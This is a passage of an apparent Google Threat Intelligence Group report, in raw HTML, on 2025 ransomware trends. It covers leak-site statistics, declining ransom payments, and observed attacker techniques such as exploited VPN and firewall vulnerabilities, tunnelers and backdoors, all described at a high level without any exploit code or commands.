style="vertical-align: baseline;">Introduction</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive threats to organizations across almost every industry vertical and region. In recent years ransomware operations have evolved, creating a robust ecosystem that has lowered the barrier to entry via the commoditization and specialization of the supporting underground communities, which is exemplified by the proliferation of the ransomware-as-a-service (RaaS) business model. While ransomware remains a dominant threat due to the volume of activity and the potential for serious operational disruptions, we have observed multiple indicators that suggest the overall profitability of ransomware operations is in decline. This trend is likely the result of multiple factors, including improved cybersecurity practices, increased ability of organizations to recover, and declining ransom payment amounts and rates. Further, numerous disruptions have impacted the ransomware ecosystem in recent years, from external forces like law enforcement operations to internal conflict between actors; both have led to the disappearance or significant debilitation of previously prolific RaaS groups like LockBit, ALPHV, Basta, and RansomHub. However, despite these shakeups, the well-established Qilin and Akira RaaS brands rose up to fill the vacuum, leading to a record high number of victims posted to data leak sites (DLS) in 2025 (Figure 1).</span></p> <p><span style="vertical-align: baseline;">This report provides an overview of the ransomware landscape and common tactics, techniques, and procedures (TTPs) directly observed in the 2025 ransomware incidents that Mandiant Consulting responded to. In this analysis, we excluded activity focused only on data theft extortion. Key insights include: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a third of incidents, the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">77 percent of analyzed ransomware intrusions included suspected data theft, a notable uptick from 57 percent of incidents in 2024.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In approximately 43% of ransomware intrusions we responded to in 2025, the threat actors were observed targeting virtualization infrastructure, an increase from 29% in 2024.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">REDBIKE was the most frequently deployed ransomware family, accounting for 30 percent of analyzed ransomware incidents.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Several trends from prior years remained consistent, including a decreased use of certain intrusion tools like BEACON and MIMIKATZ and a plateau in the reliance of remote management tools.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Google Threat Intelligence Group (GTIG) analysis of TTPs relies primarily on data from Mandiant engagements and therefore represents only a sample of global ransomware intrusion activity. These incidents involved the post-compromise deployment of ransomware following network intrusion activity, with the majority of incidents also involving data theft extortion. The impacted organizations were based across the Asia Pacific region, Europe, North America, and South America and within nearly every industry sector. </span></p> <p><span style="vertical-align: baseline;">While we anticipate ransomware will remain one of the most impactful cyber threats in 2026, the reduction in profits may cause some threat actors to leverage other monetization methods and tactics, such as continuing targeting shifts, further increasing data theft extortion operations, the use of more aggressive extortion tactics, or opportunistically using access to victim environments for secondary monetization mechanisms. </span></p> <p><span style="vertical-align: baseline;">Recommendations to assist in addressing the threat posed by ransomware are captured in our white paper, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ransomware-protection-and-containment-strategies"><span style="text-decoration: underline; vertical-align: baseline;">Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment</span></a>.</p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig1.max-1000x1000.png" alt="Top 10 DLS in 2025 and associated ransomware families"> </a> <figcaption class="article-image__caption "><p data-block-key="w4gzu">Figure 1: Top 10 DLS in 2025 and associated ransomware families</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">2025 Ransomware Landscape </span></h3> <p><span style="vertical-align: baseline;">In 2025, the ransomware landscape became increasingly crowded, with a record high number of unique DLS with at least one post. The growing pool of ransomware actors engaging in extortion operations combined with persistent targeted efforts by law enforcement and enhanced organizational security has likely shrunk profit margins for ransomware operators in recent years. In response, threat actors appear to be adopting new strategies from who they target to the technologies they use. This evolution has included an apparent increase in targeting smaller organizations, and a possible focus on data theft extortion without ransomware deployment. Furthermore, threat actors are incorporating artificial intelligence (AI) into aspects of their operations (e.g., negotiations) and leveraging Web3 technologies to bolster the resilience of their infrastructure. While we see expansions in these aspects, internal and external disruptions seen in recent years have prompted some threat actors to become more cautious resulting in more rigorous vetting of potential partners. We expect ransomware actors to continue to adjust and evolve their tactics in an attempt to maintain some level of success or regain the levels of profitability they reached historically.</span></p> <p><span style="vertical-align: baseline;">2025 marked a record year for the number of posts on DLS, with the total number of posts surpassing that of 2024 by almost 50%. Despite these record setting numbers, we caution against relying solely on DLS data to ascertain the overall volume of ransomware activity. Threat actors typically only create DLS posts for victims that have refused to initiate or complete extortion negotiations. Public reporting </span><a href="https://www.coveware.com/blog/2026/2/3/mass-data-exfiltration-campaigns-lose-their-edge-in-q4-2025#payments" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">indicates</span></a><span style="vertical-align: baseline;"> that ransom payment rates have been declining, which could, at least partially, fuel the steady increase of posts on shaming sites. It can also be difficult to differentiate between DLS posts associated with data theft-only operations and those that also include ransomware deployment. For example, threat actors associated with the CL0P DLS continue to occasionally deploy ransomware but have shifted primarily to data-theft-extortion-only operations. So while CL0P was the third most prolific DLS in 2025, the vast majority of incidents associated with these posts did not involve ransomware. We have also observed numerous instances of threat actors, such as those associated with BABUK 2.0, fabricating and exaggerating claims as well as reposting claims that would at least slightly inflate victim counts. Finally, not all claims are of equal significance. For example, between December 2024 and January 2025, FUNKSEC was the highest volume DLS; however, many of the associated incidents appeared to be lower impact events involving compromising websites for data theft extortion.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig2.max-1000x1000.png" alt="Volume of posts and unique data leak sites from 2020 through 2025"> </a> <figcaption class="article-image__caption "><p data-block-key="w4gzu">Figure 2: Volume of posts and unique data leak sites from 2020 through 2025</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Although ransomware has historically been highly lucrative, recent disruptions and enhanced organizational security may be impacting these profits. Public reporting indicates that both ransom payment rates and average ransom demands are decreasing. In February 2026, Coveware </span><a href="https://www.coveware.com/blog/2026/2/3/mass-data-exfiltration-campaigns-lose-their-edge-in-q4-2025" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reported</span></a><span style="vertical-align: baseline;"> that ransom payment rates have generally decreased over the past few years, reaching a historic low in Q4 2025. Similarly, in June 2025, Sophos </span><a href="https://assets.sophos.com/X24WTUEQ/at/9brgj5n44hqvgsp5f5bqcps/sophos-state-of-ransomware-2025.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reported</span></a><span style="vertical-align: baseline;"> that the average ransom demand has dropped by one-third during the last year, to $1.34 million in 2025 from $2 million in 2024. Public reporting further suggests that organizations that have been impacted by ransomware are able to recover more easily, which also likely contributes to reduced ransom payments. For example, in February 2025, Unit 42 </span><a href="https://www.paloaltonetworks.com/engage/unit42-2025-global-incident-response-report" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reported</span></a><span style="vertical-align: baseline;"> that companies have improved their ability to recover from ransomware incidents; nearly half of ransomware victims were able to restore from backup in 2024 compared to around 28% in 2023 and only 11% in 2022.</span></p> <p><span style="vertical-align: baseline;">Improvements in organizational security and the growing ability of victims to recover from ransomware attacks may be leading some adversaries to view data theft as a more reliable method for securing payments. In intrusions investigated by Mandiant, we observed a decline in traditional ransomware deployment coinciding with a rise in data theft extortion. Further, some RaaS programs are providing data-theft-extortion-only options in addition to ransomware, which may reflect demand from their customer base. It is also plausible that more robust security posture, particularly at larger organizations, is forcing threat actors to adjust their targeting to focus on a higher volume of attacks targeting smaller organizations with less mature security programs. Analysis of organization size (based on estimated number of employees, when available) of victims posted on DLS indicates threat actors have shifted away from larger organizations and toward smaller organizations (Figure 3). Threat actors have directly commented on this trend. For example, in leaked April and May 2024 chats, a Basta actor theorized that targeting smaller company networks would be more effective compared to "normal networks."</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig3.max-1000x1000.png" alt="Percentage of DLS posts for victims with an estimated company size of less than 200 employees"> </a> <figcaption class="article-image__caption "><p data-block-key="w4gzu">Figure 3: Percentage of DLS posts for victims with an estimated company size of less than 200 employees</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">During 2025, numerous disruptive events impacted the ransomware ecosystem, including both a range of law enforcement and government actions as well as threat actor-related data leaks and disputes, at least some of which appear to be the result of turmoil amongst threat actors (Figure 4). Not only did many of these events result in direct disruption such as arrests, seizures, and sanctions, but some also forced threat actors to shift TTPs and provided valuable insights to security researchers on the inner workings and individuals behind some ransomware operations. Yet the dominance of long-standing Qilin and Akira brands in 2025 demonstrate the resilience of ransomware actors and their ability to fill voids following takedowns and exit scams of competing RaaS operators. There are some indications that the overall instability in the ransomware threat landscape, coupled with pressure from law enforcement, have caused ransomware teams to increase their operational security, which has translated into more rigorous vetting of potential affiliates. We've also seen some private or semi-private offerings gain prominence. For example, 2025 marked the first time in four years that one of the top two most prolific RaaS operations was not public; while Akira appears to have affiliates, they do not have a public advertisement for their operations.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig4.max-1000x1000.png" alt="Key disruptive events impacting the ransomware landscape"> </a> <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 4: Key disruptive events impacting the ransomware landscape</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In 2025, ransomware actors continued to evolve their operations by adopting emerging or established technologies to increase the efficiency and efficacy of their operations. Some threat actors are integrating Web3 technologies into their operations, likely as a way to make their infrastructure more resilient to takedown and detection efforts. The Cry0 RaaS claims to leverage Internet Computer Protocol (ICP) blockchain to host negotiation sites via decentralized canister smart contracts, enabling clearnet access without requiring TOR while DEADLOCK ransomware has leveraged Polygon smart contracts in order to store and rotate C2 infrastructure. We have also seen threat actors incorporating AI-features into their RaaS offerings: the GLOBAL RaaS reportedly has an AI-assisted chat that provides victim analysis and assists with communications, CHAOS purportedly includes a "built-in AI chatbot," although its specific use is unclear, while BERT allegedly uses AI-based data analysis to identify victim pressure points. Finally, we have observed twice the number of ransomware families that were capable of running on both Windows and Linux systems compared to 2024. This could suggest that threat actors are shifting toward cross-platform ransomware rather than creating multiple, separate variants to support their operations.</span></p> <h3><span style="vertical-align: baseline;">Commonly Observed Tactics, Techniques, and Procedures</span></h3> <p><span style="vertical-align: baseline;">The following sections discuss trends in the TTPs observed in post-compromise ransomware deployment incidents, organized into the corresponding stages of GTIG's attack lifecycle model (Figure 5). The TTPs outlined in this section were observed at Mandiant-led ransomware investigations during 2025.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig5.max-1000x1000.png" alt="Attack lifecycle associated with 2025 ransomware incidents"> </a> <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 5: Attack lifecycle associated with 2025 ransomware incidents</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Initial Access</span></h4> <p><span style="vertical-align: baseline;">During 2025, the most commonly identified initial access vector in ransomware incidents was the exploitation or suspected exploitation of vulnerabilities, accounting for a third of incidents, followed by web compromise, stolen credentials, and bruteforce attacks (Figure 6). Notably, while voice phishing was a commonly leveraged tactic in several high profile data theft extortion campaigns, it was not observed in ransomware incidents. This year we included suspected initial access vectors in our analysis to provide a more holistic view, given that some vectors can be more difficult to verify. For example, it can be difficult to confirm the use of stolen credentials, given that the credentials may have been harvested in a separate incident that occurred weeks prior or even on a personal device. Conversely, bruteforce attacks tend to generate many log entries that can be used to confirm the vector.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Throughout 2025 we observed ransomware operators leveraging a wide range of exploits for initial access (Table 1). While the majority of observed or suspected exploitation activity involved vulnerabilities disclosed prior to 2025, we observed multiple indicators that at least some ransomware actors were leveraging </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review"><span style="text-decoration: underline; vertical-align: baseline;">zero-day exploits</span></a><span style="vertical-align: baseline;"> in their operations.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In the majority of instances where exploits were used or suspected, the threat actors targeted vulnerabilities in common VPNs and firewalls such as Fortinet (CVE-2024-55591, CVE-2024-21762, and CVE-2019-6693), SonicWall (CVE-2024-40766), Palo Alto (CVE-2024-3400), and Citrix (CVE-2023-4966).</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We also observed malicious actors successfully exploit a variety of other exposed services, including Veritas Backup Exec, Zoho ManageEngine, Microsoft Sharepoint, and SAP Netweaver.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed evidence that multiple ransomware and/or data theft extortion operations leveraged zero-day vulnerabilities for initial access throughout the year.</span></p> </li> <ul> <li aria-level="3" style="list-style-type: square; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During mid-July 2025, an UNC6357 actor attempted to exploit Microsoft Sharepoint vulnerabilities CVE-2025-53770 and CVE-2025-53771 to gain access to the victim's environment and ultimately deploy LOCKBIT.WARLOCK. While this was observed after disclosure of the vulnerability, we observed evidence—including log data and public </span><a href="https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reporting</span></a><span style="vertical-align: baseline;">—suggesting the same actor attempted to exploit the same vulnerability as a zero-day.</span></p> </li> <li aria-level="3" style="list-style-type: square; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In August 2025, GTIG assessed with high confidence that UNC2165 leveraged a zero-day exploit for CVE-2025-8088 to deploy MYTHICAGENT.</span></p> </li> <li aria-level="3" style="list-style-type: square; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">While the observed incidents did not involve ransomware deployment, threat actors associated with the CL0P DLS may have </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation"><span style="text-decoration: underline; vertical-align: baseline;">exploited</span></a><span style="vertical-align: baseline;"> CVE-2025-61882 as a zero-day against Oracle EBS environments. The CL0P DLS has been associated with multifaceted extortion operations involving CLOP ransomware; however, it is primarily associated with data theft extortion operations rather than ransomware deployment.</span></p> </li> </ul> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed multiple threat clusters leverage malvertising and/or search engine optimization (SEO) tactics to distribute malware payloads for initial access, including both ransomware operators themselves and initial access partners that ultimately led to follow-on ransomware intrusions. </span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed multiple UNC6016 malware distribution operations leverage malvertising to distribute malware payloads masquerading as legitimate software tools such as PuTTY to gain initial access. At least a portion of observed UNC6016 access operations ultimately lead to NITROGEN or RHYSIDA ransomware deployments.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">UNC2465 routinely leveraged malvertising and/or SEO techniques to distribute SMOKEDHAM payloads masquerading as RVTOOLs installers.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">While less frequent this year, many threat actors continued to rely on stolen credentials for initial access. In 21% of intrusions where the initial access vector was identified, the threat actor leveraged compromised legitimate credentials to access the victim environment, typically involving authentication to a victim's VPN or a Remote Desktop Protocol (RDP) login. While the source of stolen credentials cannot always be determined, actors can obtain them via numerous techniques including purchasing credentials from underground forums or using credentials exposed in infostealer logs.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We continued to see a subset of actors leveraging bruteforce attacks against victims' VPNs. In one incident involving ransomware that identified itself as Daixin, the threat actor conducted periodic bruteforce attacks against various VPN user accounts over the course of nearly a year before successfully gaining initial access.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed multiple intrusions where the ransomware operator gained access to the victim through an intermediary network. </span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed multiple disparate ransomware operations that leveraged network access to subsidiaries of victims to subsequently access the victim's network. In one instance the threat actor leveraged access to the subsidiary to bruteforce access to the victim's VPN.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a separate incident, the threat actor leveraged a VPN connection owned by a third-party vendor to access an operational technology (OT) system within the victim's environment.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During one intrusion leading to CLOP ransomware deployment, UNC5833 gained access from an initial access partner who impersonated a helpdesk user to social engineer an employee via a Microsoft Teams chat session to install Quick Assist. While we observed limited use of social engineering by ransomware operators during 2025 in incidents we observed, it remained a popular technique among financially motivated intrusion actors more broadly.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig6.max-1000x1000.png" alt="Initial intrusion vectors"> </a> <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 6: Initial intrusion vectors</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Vendor</span></strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Product</span></strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">CVE</span></strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Fortinet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">FortiOS / FortiProxy</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2024-21762</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Veritas</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Backup Exec</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2021-27877</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Veritas</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Backup Exec</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2021-27878</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Zoho</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ManageEngine ADSelfService Plus</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2021-40539</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Fortinet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">FortiOS / FortiProxy</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2024-55591</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Fortinet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">FortiOS</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2019-6693</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SonicWall</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SonicOS</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2024-40766</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Citrix</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">NetScaler</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2023-4966</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Microsoft</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SharePoint</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2025-53771</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Microsoft</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SharePoint</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2025-53770</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SAP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Netweaver</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2025-31324</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Palo Alto</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PAN-OS GlobalProtect</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2024-3400</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CrushFTP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CrushFTP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2025-31161</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 1: <span style="vertical-align: baseline;">Vulnerabilities likely leveraged for initial access in 2025 ransomware incidents</span></span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Establish Foothold and Maintain Presence</span></h4> <p><span style="vertical-align: baseline;">Once inside victim environments, threat actors engaged in many different techniques to establish a foothold and maintain presence, including leveraging valid credentials, tunnelers, backdoors, or legitimate remote access tools. Threat actors continued to use remote management tools to support both these phases of the attack lifecycle, albeit at slightly lower rates than 2024.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Ransomware actors consistently relied on compromised credentials to establish a foothold in victim environments. </span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Once authenticated to network services, they also often used these credentials to provision or modify highly privileged accounts to maintain access. For example, in a RIFTTEAR incident, the threat actor authenticated via Kerberos to a privileged system, provisioned an AD domain user, and added the account to a high-privileged group. We also saw multiple threat actors change passwords to root accounts on ESXi hosts.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In 2025, an increased number of threat actors adopted tunnelers to support these phases compared to 2024 observations. Observed tunnelers included publicly available offerings such as PYSOXY, CHISEL, CLOUDFLARED, RPIVOT, and REVSOCKS.CLIENT alongside seemingly private tunnelers like LIONSHARE, VIPERTUNNEL, and BLUNDERBLIGHT.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a LOCKBIT.WARLOCK incident, the exploitation of a Microsoft SharePoint vulnerability enabled remote code execution, granting the access required to install CLOUDFLARED from Github via the Windows msiexec command-line utility, establishing an outbound-only C2 channel.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A subset of threat actors deployed backdoors—including CORNFLAKE.V3.JAVASCRIPT, SQUIDGATE, FIREHAWK, HAVOCDEMON, and SMOKEDHAM—to establish a foothold.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">UNC6021, a suspected FIN6 threat cluster, used SQUIDGATE's built-in functionality to deploy FIREHAWK, a toehold backdoor written in C. Consistent with FIN6 